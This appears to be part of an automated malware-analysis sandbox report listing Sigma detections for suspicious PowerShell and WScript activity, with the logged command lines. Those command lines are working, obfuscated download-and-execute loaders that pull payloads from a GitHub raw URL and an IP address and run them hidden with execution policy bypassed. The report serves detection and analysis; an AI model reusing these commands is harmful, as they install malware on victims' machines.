                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe,
                      Sigma detected: Potentially Suspicious PowerShell Child Processes
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3812, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , ProcessId: 7156, ProcessName: wscript.exe
                      Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydElu
                      Sigma detected: Suspicious MSHTA Child Process
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))", CommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICA
                      Sigma detected: Suspicious PowerShell Parameter Substring
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe, CommandLine|base64offset|contains: L, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3812, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe, ProcessId: 2228, ProcessName: powershell.exe
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3812, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , ProcessId: 7156, ProcessName: wscript.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 